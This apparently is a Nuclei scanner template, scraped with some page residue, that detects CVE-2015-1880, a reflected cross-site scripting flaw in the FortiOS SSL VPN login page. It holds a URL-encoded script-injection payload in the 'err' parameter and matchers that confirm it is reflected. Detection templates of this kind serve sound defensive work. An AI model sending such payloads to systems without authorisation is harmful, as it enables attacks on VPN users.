36 lines
961 B
YAML
36 lines
961 B
YAML
id: CVE-2015-1880
|
|
|
|
info:
|
|
name: XSS in Fortigates SSL VPN login page
|
|
author: pikpikcu
|
|
severity: medium
|
|
description: Cross-site scripting (XSS) vulnerability in the sslvpn login page in Fortinet FortiOS 5.2.x before 5.2.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-1880
|
|
- https://www.c2.lol/articles/xss-in-fortigates-ssl-vpn-login-page
|
|
classification:
|
|
cve-id: CVE-2015-1880
|
|
tags: cve,cve2015,xss,fortigates,ssl
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/remote/login?&err=--%3E%3Cscript%3Ealert('{{randstr}}')%3C/script%3E%3C!--&lang=en"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: word
|
|
words:
|
|
- "<script>alert('{{randstr}}')</script>"
|
|
part: body
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: word
|
|
words:
|
|
- "text/html"
|
|
part: header
|